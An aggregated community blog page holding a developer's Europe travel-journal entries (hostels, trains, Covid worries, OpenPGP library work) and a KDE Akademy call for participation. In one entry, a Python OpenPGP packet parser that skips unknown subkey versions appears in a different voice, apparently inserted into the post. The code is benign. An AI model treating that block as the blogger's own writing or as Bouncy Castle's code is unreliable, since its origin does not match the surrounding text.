Free Software, Free Society!
Thoughts of the FSFE Community (English)

Tuesday, 24 May 2022

Europe Trip Journal – Entry 22: Drowsy and Annoyed

Today was a rather slow day. I got up at 8:20 to get breakfast at the hostel. This time they had bread \o/. I was the only one eating there, everybody else (there was a group of elderly people staying at the place too) must have gotten theirs already. At some point C. came down to get her breakfast too. She however decided to eat in the garden.

After I finished my meal, I went back to my room to lie down on the bed for an hour or so, before it was time to pack my bag. After checkout at 11:00, I said farewell to C. and headed to the metro station. Halfway there I noticed that I forgot my leftover beer bottles at the hostel's fridge, but I decided not to go back. May someone else enjoy a drink on my behalf 🙂

I had 3:30h left before I would take the train, so how to best spend that time? In the metro station I studied the network map and decided that I wanted to check out the port near the city center, which I had not visited yet.

When I walked up the stairs at the port station (I forgot the name unfortunately), immediately the smell of fish got into my nose. Et voilà, directly next to the metro entrance was a big stand displaying dead fish.

More interesting than the fish I found a pharmacy sign at the other side of the bay. Having no high-speed internet left on my phone (come on, they say they throttle the connection down to lower speeds, but in reality they suffocate the phone's connectivity! I would not mind not being able to watch videos while not on WiFi, but at least text-only pages should still work! Right now, not even translator pages would load without timing out. Someone needs to sue! Rant over) I was unable to search for the French word for coughing, so I just winged it and asked the pharmacist if she would be able to speak English. Luckily she was, so I was able to get some medicine. Hopefully my coughs are gone until the end of the week.

With this out of the way, I wandered around without a plan for some time and eventually decided to go to the local Burger King in hope for some WiFi. At this point I was annoyed at the waiting time and just wished that time was running faster. After finishing a vegan whopper and an ice tea it was still about 2h left, but I had enough of the port area so I took the metro to the station nonetheless.

When I entered the station, my hand searched for my ticket but I could not find it. I searched my other pocket but no trace of the ticket. Damn. Annoyed I was about to buy another ticket when I saw one lying on the access control gates. Was that mine? I took it and placed it on the sensor and sure enough, the gate opened. Kind French people 🙂

My wait at the train station was unspectacular and just as annoying. I sat down on a bench and listened to music. I was really tired so I almost fell asleep again and again. Time still seemed to crawl so it was like an eternity until finally the schedule display showed the platform on which my train was waiting. The train ride was the same deal. I just wanted to get to Lyon and so I listened to music and tried not to fall asleep.

In Lyon I took the metro. I had to switch 2 times, the third time being just for one more station. The last metro train was waiting at a station that was quite aggressively tilted. So far even, that between the tracks there was a toothed rack, so apparently this was a cog railway! I’ve never taken one. A few minutes after, the train departed and rolled into the deep black of the tunnel. After a rather steep descent it eventually transitioned into the horizontal. Then it felt like the train was aggressively accelerating as I was pushed to the back. However, there was no engine howl or anything, the sound of the engine stayed the same. Finally I realized that the train was on a super steep ascent. And then it stopped at the station. After getting off the train, I had to take a picture of the station:

Note, that the camera is held perfectly horizontally

The hostel was just a few meters away, so finally I could check-in and get some more rest in my bed. What an annoying day.

In the evening I did some work in the community area of the hostel. There is a new revision of the Stateless OpenPGP Protocol specification which adds support for password-protected keys. I got to work implementing these changes in sop-java, which is the generic interface library used by pgpainless-cli and pgpeasy.

Another guest sat down next to me with a jute bag displaying a “there is no cloud” logo. He pulled out a Thinkpad covered in stickers just like mine. I noted that these were some nice stickers and we got to talk for a short while. He asked me if I was attending MixIT, an IT conference which was apparently happening in Lyon just now. I denied and he told me the conference was held exclusively in French anyways. Still, would have been nice to combine my stay here with a visit at a hacker conference 😀

Now it's time for me to go to bed. Hopefully the medicine I got will work and I won't keep everybody in my room awake.

Monday, 23 May 2022

Akademy 2022 Call for Participation is open

The Call for Participation for Akademy is officially opened!

...and closes relatively shortly! Sunday the 12th of June 2022

You can find more information and submit your talk abstract here: https://akademy.kde.org/2022/cfp

If you have any questions or would like to speak to the organizers, please contact akademy-team@kde.org

Europe Trip Journal – Entry 21: Ferris Wheels and Train Tickets

This morning I got up at 8:00 which is an hour earlier than during the rest of the trip – and let's not talk about my usual sleep schedule. The reason was that breakfast was served from 7:00 to 9:00 in the hostel. J. and me arrived at 8:15 or so and to my disappointment there was no bread left. As a replacement they served Zwieback onto which I applied a thick layer of jam. After the breakfast it was time to say farewell to J. as he had to catch his train.

My plans for the day were comprised of going to the beach. That’s it. I had located a strip of sand on OpenStreetMap earlier and used a water fountain as waypoint for Organic Maps. The app suggested taking the metro, so I walked out of the hostel in the direction of the station. On the way I crossed a park with fitness devices. How nice is that? People here can go for a run and have free access to public sports devices!

The metro station was massive. I turned a corner, expecting the usual stairs down into a rabbit hole where you need to mind your head to prevent injury, but no. This station was a whole other deal. Four long stairs led down to what looked like a bunker entrance, several tens of meters under floor level. Across from the stairs I was taking was another set of stairs leading up again, and also some escalators.

Again, the image doesn’t do justice to the massive scales of the station

Down in the station there was another set of stairs that finally led down to the platform. I found it fascinating that the metro in Marseille has rubber tires! I guess that is so it can provide those high acceleration values?

I had to switch metro once to get to my destination and from there I had to walk for about 20 minutes to reach the beach. The spot I had chosen was a gravel beach, but the individual pebbles were all rounded down smooth and actually felt nice to walk and sit on. I relaxed a bit after which it was time to check out the water.

It was cold.

After only 2 minutes or so I had enough of swimming and went back onto the beach to lie down and re-heat using the power of the sun. A few hours later I grabbed my stuff and walked down the beach as I had seen a Ferris Wheel in the distance.

The guy in the ticket booth was asleep and it took me several attempts to wake him up. Finally a spirited “Bonjour?” through the small opening in the plexiglass woke him up so I could buy my ticket. The view was not as spectacular as for example the ride with the cable car in Barcelona, but I could get a good overview nonetheless.

After 2 revolutions of the Ferris Wheel I decided to get back to the hostel, so I had to walk all the way back to the metro station and take the same route back. After yesterday's miserable attempt at buying groceries on a Sunday, today I had another try. I found a shop which unfortunately was very overpriced, but I still got some beers, yogurts, chips and a chocolate bar.

Then it was time for dinner, followed by an hour of work. I added some tests to my pull request against Bouncy Castle which I had reported on in an earlier post, and then spontaneously decided to attend an OpenPGP meeting which will take place at the end of the week in Geneva. For that reason I had to cancel my plans to go to Italy next and instead book train tickets and hostels for a slightly different route. I guess I will visit Italy another time :). Oh boy, Geneva is expensive!

And now I am sitting here, alone in the dining hall, writing this post. This is the only place in the hostel with the tri-factor of okay-ish WiFi coverage, a wall plug and comfortable seating. Unfortunately my coughs are back and they are super annoying. Thanks to C. for lending me her mug so I can sip some tea which hopefully helps a bit. I hadn’t managed to get to a pharmacy today, but I will try again tomorrow.

Europe Trip Journal – Entry 19 – 20: Tranquility

My second day in Nimes was unspectacular. After getting up eventually, I went into the city to get some breakfast. I settled on a salad in a restaurant close to the Arena. When I finished the salad, I wandered around in the city.

You could visit the Arena, however I was a bit confused by mixed messages. Some places stated that entry was free, but the sign at the entrance prompted to buy a ticket for 10€. There were also guided tours for a higher price, so in the end I decided not to visit the Arena from the inside. Part of my reasoning was also that the place was undergoing some maintenance currently, so not all parts could be visited.

A few streets further, I reached a big temple. Unfortunately it was closed right now, so I could only take some pictures from the outside.

It was pretty hot with the sun standing high up in the sky, so soon I took refuge in a supermarket. Here I bought some sweets, a liter of milk as well as a bottle of blue Fanta which I had never tried before. I also wanted to get some breakfast for the next day, so I decided to get some cereals. However I would not want to take the opened pack of cereals with me later, so instead I was glad to find a “cereal station” where I could fill my desired small amount of cereals into a paper bag.

Back at the hostel I was exhausted. It was only around 14:00 or so, maybe earlier, but I was already drenched in sweat. I decided to lie in bed to wait until the bulk of the heat was gone. In the end I ended up lying there for 4 hours or so, so it was early evening when I was ready to go for another walk.

I had eaten too many of the sweets I had bought earlier, so I had a sugar-induced headache. It was time for a real meal to dilute the sugar concentration down. I stopped at a restaurant next to the one where I had gotten the Camembert Fondue the day before and ordered a vegetarian burger. It came with fries, a small salad and I also got a local beer of Nimes with it. Nice.

Finally I went to bed after a day that felt a bit wasted, but hey, I’m on vacation!

The next morning I got up and went down to the kitchen to get some cereals for breakfast. When I later left the hostel, I forgot to take the half liter of leftover milk with me, so in case you are staying in the hostel near the train station in Nimes, feel free to take my milk (it's labeled “Paul” ;)).

My train had 15 minutes of delay, so I had to wait a bit at the train station. The ride was uneventful and quick (only about an hour). Arriving in Marseille, as usual my first destination was the hostel. This time the place I had booked was the farthest away from the station it had ever been. I had to walk about 5km through the heat of noon. I rarely met any locals, I guess those were clever enough to avoid the heat.

Marseille is mountainous and my hostel was located at the top of a hill. After 1 and a half hours I finally reached the place, however they would only open in about another hour from now. I found a bench which I sat down on and relaxed a bit. From the outside the hostel looked a bit like a haunted mansion. I couldn’t make out any signs of life. Did I book at a closed place by mistake?

Will I ever escape this haunted house?

Eventually some people appeared on the premises, so I got up and after searching the entry for a while (I had to ring for them to open a gate), I went to the reception. The inside of the building was not what I had expected. It looked like a big mansion, with an atrium (I’m not sure if that’s how it's called) and lots of intricate decorations and a mosaic floor.

Quo Vadis!

What a fascinating place. Outside was a big garden with some tables and a very nice view over the city. I heard that they also offered sleeping in tents.

Earlier that day I had noticed that I was running out of clean clothes, so it was time for laundry day again. I asked in the reception, if it was possible to do the laundry here and they said that there was a machine in the garden. I must have made a confused face, as the receptionist quickly followed with “I will show you”. She guided me to a small shed in the garden where there were two washing machines. I put my stuff into one of them and then asked where to dry the clothes afterwards, to which she replied that there were clotheslines behind the shed.

In my room I met J., a traveler from the US. We exchanged some few words, but he seemed a bit tired, so I decided not to bother him too much.

As I was a bit hungry, I decided to buy some groceries next. Some chips and some yogurts would be nice, along with two or three bananas. On OpenStreetMap I located a Carrefour some 1.5km away and so I grabbed a small bag and started walking. It was only when I stood before closed doors that I remembered it was Sunday. On the way back I saw a sign for a pizza place, so I wasn’t out of options.

Back at the hostel my laundry was soon finished so I got it out of the machine and went behind the shed where there was a small maze of clotheslines. One was free so I put my stuff on a little plastic table and started hanging my stuff. Usually I dislike doing the laundry, as I deem it to be a very mundane, tedious task, but today it was different.

The sun was slowly starting to set and was sending its warm, friendly beams my way. Birds were singing and the tall grass was tickling my legs. A pleasant warm summer breeze was carrying the distant, muffled sounds of the city which was slowing down after the day. It was a summer evening in France. Suddenly all the exciting and all the wrong that was going on in the world faded into the background. For a short moment priorities shifted and the world seemed to center around me and my laundry. It was a perfectly peaceful moment of tranquility and I enjoyed it.

Later I decided to get a pizza from the place I had seen earlier. I got a tomato-mozzarella pizza with olives. The place had no tables as it was primarily focusing on delivery services, but luckily I was able to order in situ. After only 10 minutes or so my pizza was ready and I walked back to the hostel.

In the garden I met C., a woman who turned out to be from Germany as well. Since everyone at the hostel was about to get dinner, I decided to join C. and J-L., a French guy with a Star-Trek’y first name, at their table. C. explained that she wanted to move to Marseille at some point and that she was currently looking for potential places. Soon J. also joined us. C. noted that J. and I would look like brothers and we soon found out that there were some staggering similarities between us. Like me, J. was traveling for 3 weeks already and he also wanted to go further south-east next until ending his journey at the end of the month. He was also studying computer science like I did and was also currently making a living as a software developer, although he was doing front-end web development.

We spent the evening talking about all sorts of stuff in a vivid mix of French, English and German and it was so nice to forget that we were from different countries and just be people. J. had learned French solely through an app, which is quite impressive given how fluid he was able to communicate. Although I had learned French for 3 years in school I had forgotten most of it, so I had some trouble following the French parts. It steadily improved though as I remembered more and more of the vocabulary.

Then it was time to go to bed. I wasn’t feeling febrile anymore and my sore throat had mostly stopped to hurt, but now in the evenings I had the strong urge to cough. Since I didn’t want to wake up my room mates I tried to suppress it, but a super uncomfortable itch was making it hard for me to breathe without coughing. It was so bad that it was shaking my whole body sporadically. In order to not wake up the others I spent some time on the toilet until eventually I was able to fall asleep in my bed without any more coughs. I’m not sure if this is a regular cold or what it is, but I will ask for some medicine in a local pharmacy today.

Saturday, 21 May 2022

Europe Trip Journal – Entry 18: Change of Plans

During the night, another guest of the hostel in Barcelona decided that at 3:00 it would be the perfect time to wash his laundry in the room's sink. Otherwise the night was okay, so at 9:00 I got up and got a nice, rich breakfast consisting of cereals, a croissant, a yogurt and a banana. Plus 2 cappuccinos for good measure.

My plan for today was to go to the train station to get a reservation for the train to Montpellier which would go later in the day. However, when I arrived at the station and got to the ticket office after waiting half an hour in the queue, the ticket seller told me that the train was booked out. However, they offered me to try some smaller, regional trains. Those would go earlier, but I would have to switch multiple times. On the bright side though, I also would not need to buy reservations. So after waiting at the station for another hour, I boarded the train to Cerbère.

This was a regional train, meaning it would make regular stops at small stations and its top speed was quite a bit lower than what I had gotten used to during my trip. Once again I was able to observe the landscape slowly changing. The orange-ish soil progressively vanished under greenery and the mountains got steeper. When the train reached Port-Bou, one station before terminus, I was in awe admiring the blue of the sea on my right while green mountainsides were close to my left.

This place would have been nice for a day or so too!

In Cerbère I was greeted by police who wanted to control passengers' passports at the platform. This was the first time I was getting checked by authorities. They basically just glimpsed over my identification, while some other travelers apparently weren’t quite as lucky. I can only speculate, but based on the gestures of the policemen, I assume they were lacking some required document. Police took them with them, presumably to verify their identities at the police station.

It was already past 16:00 and I was hungry. Unfortunately the two snack machines at the station were both broken. Finally the train to Avignon arrived, so maybe I was lucky at another station? Some stations later, I made a risky move and quickly left the train, ran to the snack machine at the platform, got a pack of gummies and ran back. It worked out and nobody stole my stuff 😀

I still had to book a hostel in Montpellier. When I checked the offers, I was shocked to see that 50+€ per night were the minimum. Even the youth hostels were expensive. So I looked for alternatives and finally decided not to switch trains in Narbonne, but instead stay on the train for a bit longer to leave at Nimes. Here I found a hostel at an affordable price.

Nimes Train Station

The train station in Nimes was built using large archways. When I got off the train, I thought I had to somehow move over the tracks in order to get into the city. Instead the signs led me down some stairs into what I thought was the cellar. However, the large arches eventually opened up to the street. Now I realized that the tracks were leading into the station on the first floor (European way of counting). Interesting.

I quickly checked into the hostel and then asked the receptionist for a recommendation for a place to get something to eat. He recommended me a street with lots of restaurants. It wasn’t far away, so it only was a five minutes walk. Originally I had some trusty pizza in mind, but then I thought I need to try something local. One offer made me curious: Camembert Fondue!

Mmmmmmmh 🙂

The meal was fantastic. Tagliatelle with molten Camembert on top, combined with a salad, some bread and a coke. It was so nice! If you come to Nimes some day, check out P’tit Nimois 😉

Satisfied I wandered around through Nimes for a bit longer, but it was already getting dark. I took some nice pictures of the Arena though and afterwards went to the Hostel to end the day.

While I don’t know what I’d miss out on in Montpellier, I’m liking what I have seen from Nimes so far, so it was not too bad of a deal 🙂

By the way, if as a law-abiding citizen, getting checked by police makes you uncomfortable (I know it does for me), you should really act out against the European Commission's latest plans to deploy wide-reaching “Chat Control”. The proposal is dangerous and would deploy a surveillance system in the EU which is even worse than those in repressive states like China or Russia! There are a bunch of petitions against the proposed rules, and you can even provide direct negative feedback to the EU!

Thursday, 19 May 2022

Europe Trip Journal – Entry 17: Separation of Concerns

The night was awful. While the hostel I stayed at in Madrid was super cheap, my room mates were hell. There was a group of 6 or more travelers from some Spanish speaking country abroad. Another room mate told me they were jet-lagged and that he was expecting them to keep us all awake for a long time. He wasn’t wrong.

First, those people were on their phones doing face time calls with their relatives – in bed and without head phones – until like 2am. Any reasonable person would go to the community area for that! Then at some point they stopped the phone calls, but kept talking to each other while it was already way past resting time. And it was not like it wasn’t apparent that people tried to sleep and were annoyed of them. When they finally stopped talking they kept playing games on their phones (with sound obviously). And – of course – when they finally fell asleep they soon started snoring.

At 6am or so one of their alarms went off for 20 minutes while they did not wake up from it. Finally I had enough so I stood up and started poking the owner of the alarm to wake him up. It took quite a bit of effort and they took some time to realize that I was pointing at their smartphone.

While I was already making up plans for revenge – like start a phone call at 9am in the morning just to pay them back in their own coin, surely they were planning to sleep until at least 11:00 – they got up at 8:30 and started loud conversations with one another. Another Spanish speaking guest luckily stopped them and asked them – rather aggressively – to keep it quiet and let others sleep. I wouldn’t be surprised if that guest learned Spanish over night just for the whole purpose of telling them to shut up in the morning.

Later I went to the train station and got my reservation for the train to Barcelona. I was so tired that I fell asleep multiple times during the ride, but unfortunately the seat was really uncomfortable, so the whole trip felt awfully elongated.

Finally in Barcelona I checked into my hostel and then went out to meet with M. She had extended her stay in Barcelona for a few days, so we were able to meet up a second time after my last stay in the city. We wandered around for some time, looking for a place to get some breakfast. We settled for an espresso and some bocadillos at a small café. Later another friend of M. called I’. joined us (I’m using scientific notation here, because I. and I’. are actually different people).

We wandered a bit further and eventually ended up outside a bar where we ordered 3 beers. To our delight, we also got a glass full of what apparently was un-popped, but fried corn. It tasted like popcorn, but was actually crunchy – but not hard – corn.

Soon our conversation went into that slightly weird category of questions you would ask people you had just met, but that were perhaps a bit too intimate for closer friends. You know, questions that benefit from a certain degree of anonymity and distance. We talked about past relationships and whether we could see ourselves getting married or having kids.

At some point I got asked whether my past relationship had been monogamous. Out of affect I said yes, but really this is only half the truth. While I was only meeting my partner, she was meeting someone else too. I was aware of this, as we had discussed it openly and I was okay with that. At least rationally. The fact that today I wasn’t answering the question of whether my relationship was monogamous truthfully tells me that part of me potentially hadn’t been, or at least wasn’t fully okay with it.

I haven’t really talked publicly about this to anyone. Maybe I was having superstitions that people would see me as unmanly. Maybe I didn’t want to make personal relations with “unflexible” relatives more complicated.

After we had finished our beer and were running out of topics to talk about, it was time to get back to our hostels. Since we were all staying in separate places it was once again time for me to say farewell to M. for a second and last time. And so we parted ways and I was left with my thoughts.

In software design there is the concept of separation of concerns. Responsibilities of a program would be separated into different modules and each module would have a well-defined interface. If one module of a program needs to interact with another module to get it to perform a certain task, it doesn’t really need to care about how the other module does it. It doesn’t need to learn about the techniques that the other module applies or of its philosophy. What’s important is that the job gets done. The fact that modules do not get an insight into the inner workings and most importantly the inner state of other modules is called information hiding.

I think in my personal life I’m subconsciously following the principle of information hiding to quite some extent. I’m uncomfortable when in a super market a friend would loudly state that “that’s the tooth paste you don’t like, isn’t it?”, thereby potentially revealing this information to others. Even if this piece of knowledge is harmless and mundane, I don’t like it getting leaked uncontrollably.

I recently read about a study whose findings were that people tend to swear more easily if it wasn’t in their mother tongue. Their rationale was that people associate less emotions with the translations of swear words as they would do with those in their native language. I guess for the same reason it’s easier for me to write about all this in English than it would be in my native language.

The chatter today was a casual conversation with quasi strangers where I could present myself as who I really am, uncorrupted by considerations for other people's feelings and expectations. Still, realizing that I wasn’t able to be true to myself over my past relationship made me contemplate. Maybe this is somewhat of a coming-out. A confession while it shouldn’t be.

Wednesday, 18 May 2022

Europe Trip Journal 16: Panthers and Ceiling-Milk

The past night was bad. Feeling “a bit sick” turned into feeling really sick. My head felt hot and my throat started aching. My lungs also felt strange. Earlier the day I had gotten a red warning on my phone informing me of a risky encounter during the pub crawl in Barcelona. Soon I was 90% convinced I had contracted Covid.

Getting the virus while on the trip would suck big time. Where would I quarantine? Would I need to get a hotel room for my own for a week? Or would I be allowed to travel back home? All those thoughts kept me awake for long past midnight.

I’m not afraid of catching Covid for my own sake. I’m young, I am healthy and most importantly I am fully vaccinated and already had the virus half a year or so ago. I trust in modern medicine and surely I would get over it. Don’t get me wrong, I don’t take the virus too lightly either. Some people I know got it and they had to fight it for a long time. So I consider myself lucky for having had mild symptoms when I got it.

Getting Covid would primarily suck because I would endanger others. If I would be allowed to stay in hostels, I would endanger my room mates. I would have endangered people I had met the past days, people who would have trusted me to have paid more attention.

On the other hand, in Barcelona I had been the only person to wear a mask for about a third of the time, until I obeyed the peer-pressure and put the mask away. So at least I had tried at some point. Sure, this would not acquit me of being guilty for my own behavior in any way, but I also don’t feel like I owe anyone an apology just yet.

Later the night I found out that in Spain quarantine rules had been mostly lifted, so in case I would contract the virus, I was not strictly required to self-isolate if I had only mild symptoms. The reason for this lift being that most of the population in Spain had been fully vaccinated already. Reading this calmed me down a bit. Looks like I wouldn’t be stuck in a hotel room and the risk I would impose on others would also be of limited severity.

In the morning, after getting some breakfast and checking out of the hostel I went to a nearby pharmacy and bought some auto tests. In a park I sat down on a bench and tested myself for the virus.

Negative. *phew* I will test again later, but for now I am positive (hah!) it was maybe some phantom symptoms combined with a sun stroke.

Now it’s time to get a ticket for the next stop of my journey. I’m going back to Madrid for the next night, so I bought a reservation for the train at the North station. The ticket seller told me, that the train would not go from this station, so I had to take a shuttle bus to the Joaquin Sorolla station a few hundred meters away.

Did I mention that I like terminal stations? I’m only used to through-stations, so it’s a strange feeling to see the trains head-on right in front of you. There they are, like sleeping dragons waiting to be woken up and worm their way out from the platform. Jan Böhmermann recently said that in some sense train stations are like the cathedrals of progress, built in honor for the majestic mechanical beings which are the engines that inhabit them.

Terminal train station with resting trains.

At a McDonald’s in the station I got an alibi coke in order to be able to charge my laptop. The outlet in my last hostel was broken, so the battery was only filled up half way. Unacceptable!

The train ride was productive. I got some utility methods implemented in PGPainless and then turned my focus to some issues in Bouncy Castle. When parsing certificates (OpenPGP public keys), BC will fail hard as soon as it encounters a subkey of an unknown version. While this is very predictable behavior and predictability is always a good thing, it means that as soon as the OpenPGP standard introduces some new algorithm (e.g. post quantum cryptography – PQC), BC will fail to process public keys which make use of these algorithms in its sub-keys. That’s not very good in terms of upwards compatibility. A user might want to have a key with both conventional and PQC subkeys for some time in order to transition to the latter. I proposed a PR upstream containing a set of changes which enable BC to simply skip unknown subkeys when parsing certificates.
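The fail-hard versus skip behaviour described above, as an added example that is neither Bouncy Castle's nor PGPainless' code: a Python walk over RFC 4880 packet framing that either rejects a certificate or skips a subkey of unknown version together with its binding signatures. The function names, the set of known versions and the sample bytes are constructed for illustration; key material is not parsed.

```python
# Added illustration, not Bouncy Castle or PGPainless code.
# Walks RFC 4880 packet framing only; key material is never parsed.
TAG_SIGNATURE, TAG_PUBLIC_KEY, TAG_USER_ID, TAG_PUBLIC_SUBKEY = 2, 6, 13, 14
KNOWN_KEY_VERSIONS = {4}  # assumption: this toy parser understands v4 keys only


class UnsupportedKeyVersion(ValueError):
    """Raised when a key packet carries a version the parser does not know."""


def read_packets(data):
    """Yield (tag, body) for every packet in an OpenPGP packet sequence."""
    pos = 0
    while pos < len(data):
        hdr = data[pos]
        pos += 1
        if not hdr & 0x80:
            raise ValueError("bit 7 of a packet header must be set")
        try:
            if hdr & 0x40:                      # new-format header
                tag = hdr & 0x3F
                first = data[pos]
                pos += 1
                if first < 192:                 # one-octet length
                    length = first
                elif first < 224:               # two-octet length
                    length = ((first - 192) << 8) + data[pos] + 192
                    pos += 1
                elif first == 255:              # five-octet length
                    length = int.from_bytes(data[pos:pos + 4], "big")
                    pos += 4
                else:
                    raise ValueError("partial body lengths not handled here")
            else:                               # old-format header
                tag = (hdr >> 2) & 0x0F
                size = {0: 1, 1: 2, 2: 4}.get(hdr & 0x03)
                if size is None:
                    raise ValueError("indeterminate length not handled here")
                length = int.from_bytes(data[pos:pos + size], "big")
                pos += size
        except IndexError:
            raise ValueError("truncated packet header") from None
        if pos + length > len(data):
            raise ValueError("truncated packet body")
        yield tag, data[pos:pos + length]
        pos += length


def parse_certificate(data, tolerant):
    """Summarise a certificate: primary version, [version, n_sigs] per subkey,
    and the versions of subkeys that were skipped."""
    cert = {"primary": None, "subkeys": [], "skipped": []}
    skipping = False  # True while inside the packet group of a skipped subkey
    for tag, body in read_packets(data):
        if tag == TAG_PUBLIC_KEY:
            # The primary key anchors the certificate and cannot be skipped.
            if not body or body[0] not in KNOWN_KEY_VERSIONS:
                raise UnsupportedKeyVersion("unknown primary key version")
            cert["primary"] = body[0]
            skipping = False
        elif tag == TAG_PUBLIC_SUBKEY:
            version = body[0] if body else None
            if version in KNOWN_KEY_VERSIONS:
                cert["subkeys"].append([version, 0])
                skipping = False
            elif tolerant:
                cert["skipped"].append(version)
                skipping = True
            else:
                raise UnsupportedKeyVersion(f"unknown subkey version {version}")
        elif tag == TAG_SIGNATURE:
            if skipping:
                # Binding signature of a skipped subkey: drop it, otherwise it
                # would be attributed to the previous, unrelated subkey.
                continue
            if cert["subkeys"]:
                cert["subkeys"][-1][1] += 1
        # User IDs and other packet types are not tracked in this example.
    return cert


def packet(tag, body):
    """Frame a body with a new-format header (one-octet length only)."""
    if len(body) >= 192:
        raise ValueError("sample helper only supports short bodies")
    return bytes([0xC0 | tag, len(body)]) + body


# Constructed sample: the bodies are placeholders, not real key material.
SAMPLE_CERT = b"".join([
    packet(TAG_PUBLIC_KEY, b"\x04primary-key-material"),
    packet(TAG_USER_ID, b"alice@example.org"),
    packet(TAG_SIGNATURE, b"user-id-certification"),
    packet(TAG_PUBLIC_SUBKEY, b"\x04conventional-subkey"),
    packet(TAG_SIGNATURE, b"binding-for-conventional-subkey"),
    packet(TAG_PUBLIC_SUBKEY, b"\x63future-algorithm-subkey"),  # version 99
    packet(TAG_SIGNATURE, b"binding-for-future-subkey"),
    packet(TAG_PUBLIC_SUBKEY, b"\x04second-conventional-subkey"),
    packet(TAG_SIGNATURE, b"binding-for-second-subkey"),
])

if __name__ == "__main__":
    print(parse_certificate(SAMPLE_CERT, tolerant=True))
```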

And then I already arrived at Madrid. Again, I did not get to see the hall with the tropical trees as arriving passengers were routed differently. This time my hostel was in the west of the city, some 2km from the train station. When I left the train station I immediately noticed that it was warmer here than it had been in Valencia. The sun was burning more merciless to some degree(s) (hah!).

My hostel was super cheap, and offered a unique experience I had never had before. I had booked online without any human interaction. When I stood in front of the door, there was a bell, which I rang expecting to be let in. However, a telephone rang and at some point a woman answered. I could barely understand her, but she told me I had to use the kiosk to get in. A little confused I was looking for a shop keeper, but there was none. Then I finally understood that the woman was referring me to the vending machine which stood across the entrance door.

This was my first time checking into a hostel without any kind of human interaction (apart from the accidental phone call). The vending machine turned out to be an automaton for checking into the hostel. First I was asked for my name and for the date of departure. Then I was prompted to place my passport on some kind of scanner. Some OCR tool detected the serial number of my passport (which I had to correct), and then I was prompted to place my face in front of a webcam. Afterwards the machine printed a receipt and spat out my key card for accessing the building.

The key card allowed me to enter the front door, as well as my room. Further, I figured out it also opened my locker, which revealed a set of linen for my bed, as well as a towel. Nice.

I unpacked some stuff and then went to take a quick shower after which I went into the city. Rather quickly I recognized landmarks from my last visit a few days ago. My current hostel was located within a kilometer of my last, just quite a bit lower (did I mention Madrid was 3-dimensional?).

The sun was burning so merciless that after some hours I had to return to the hostel once again. Later the day I planned to visit a place that was recommended to me by I. A pub which was a cave in which they would serve milk that comes from the ceiling. Yeah, I know.

Walking to the place did not take long. Before entering though I had to get something to eat first. I stopped at a restaurant and sat down at one of the tables outside. And then I did what confusingly the job title of the person serving me was. I waited (hah!).

After some 15 minutes or so I could finally persuade the waiter to get my order by aggressively waving at him. I ordered an Ensalada Griega (Greek salad). The meal was nice, although I felt a bit odd as they gave me 2 sets of cutlery.

After waiting another 15 minutes for the waiter to take my payment, I finally went into the restaurant to pay at the counter. And then it was finally time for the long anticipated cave-ceiling-milk!

El Chapandaz as the place was called was looking interesting. They gave the place the appearance of a cave, with stalactites everywhere. Sure, it was that cheap kind of fake rock that you might know from amusement park attractions, but still the place had a certain vibe.

El Chapandaz

I was disappointed though from the main attraction of the place. The leche de pantera (panther’s milk) was served by pouring half a liter of milk from one of the stalactites into a 1L glass which was first filled with what felt like 3 tablespoons of cinnamon. Then they added some mysterious alcoholic fluids and topped everything off with a bunch of ice cubes.

Unfortunately the result was not made for my taste buds at all. I barely managed to get 3/4 of it down, but then I had to leave the rest standing. I was a bit resigned by the outcome of the evening, but at least today I left on my mask whenever possible. Since I still don’t feel 100% okay, I soon after left and walked back to the hostel.

Tomorrow I will get up early to reserve a seat for the train to Barcelona. There I will probably meet with M. again, who is returning home that day. Then my path will likely lead me in direction of Italy somehow. We will see.

Tuesday, 17 May 2022

Europe Trip Journal – Entry 13-15: Valencia

I haven’t been posting for a while, simply because I wasn’t feeling like it. I’m writing this blog mainly for myself, to later remember what happened, what places I visited and what people I met along the way.

So here is another update.

On the 15th I enjoyed Madrid on my own. I went to the park I had reported on before and tried to work a bit on my laptop. Because I couldn’t find my jute bag which I normally use to take stuff like water bottles, my picnic blanket and other stuff with me while leaving the big backpack at the hostel, I only took my laptop with me, meaning I was relying on the availability of park benches and chairs in the park. Sitting on the grass was nice for shorter periods, but even though the grass cushions to a certain degree, longer work sessions would quickly become uncomfortable.

I sat at the table of a small takeaway for a bit and eagerly typed away while some Spanish family was celebrating a child’s birthday the next table. Unfortunately there was no shade, so after some time it got tedious and so I decided to go back to the hostel where I stayed for the rest of the day.

The next morning (it was Monday now) I got up early, had a breakfast and then went to the train station to buy a seat reservation for the next train. For some reason I made a small mistake and registered the train at 17:40 in my app though, so my reservation got booked on that date as well. When I noticed, I went back and asked if I can swap the reservation for the train at 11:40. I was relieved when it worked out, so I did not have to wait for 6 additional hours.

When I arrived at Madrid I must have been routed through another part of the train station than when I got the ticket today. I could not remember the booking hall, which in case of the Madrid Atocha train station is filled with tropical trees.

The train route was nice and I did not get any work done whatsoever. Instead I was mostly looking out the window, watching the Spanish hills fly by. And then I arrived in Valencia. I had once again, judging by the map, underestimated the size of the city so my walk to the hostel I had booked took some time, but so I got to know parts of the city.

I came across parts of what looked like the historic core of the city. Yellow stone buildings with delicate decor elements met some Assassins-Creed-esque cathedrals and open plazas with polished marble floors.

I quickly brought my stuff to my room and then packed my picnic blanket into a packing cube I normally use for clothes. Swiftly I switched my underwear for bathing trunks and then went in direction of the beach.

Again I misjudged the distance, but also the heat of the sun that barely had crossed the zenith, so I was quickly drenched in sweat. On my way I crossed what on the map had looked like a river, but it turned out to be an elongated park with bridges built over it.

So many palm trees!

After the park was a broad street with parking lots in the middle strip, something I also had never seen before.

Tell me again the world doesn’t have a problem with individual transportation

So after roughly an hour of walking and sweating I arrived at the beach. Compared to the other beaches I had been so far, this one was massive. Along the coast it went on for at least one or two kilometers (I can’t be bothered to check), and it was constantly roughly 100 meters or so thick, so there was enough place to find a spot in comfortable distance to others.

It is surprisingly hard to take photos of the beach which are suitable for distribution in this blog, since many visitors of the beach chose to go topless and I want to preserve individuals’ right to privacy. For that reason enjoy a boring image taken from far far away.

Only after I had unpacked my collection of items I had brought with me did I notice that I neither had packed a towel, nor sunscreen to replenish after bathing. So I decided that sunbathing would need to suffice that day, but made the commitment to swim in the ocean the next day.

When I went back to the hostel later, I wanted to take the metro, but I only had taken with me a 20€ billet which the ticket machine was refusing to accept. So I had to walk back. That concludes Monday’s events.

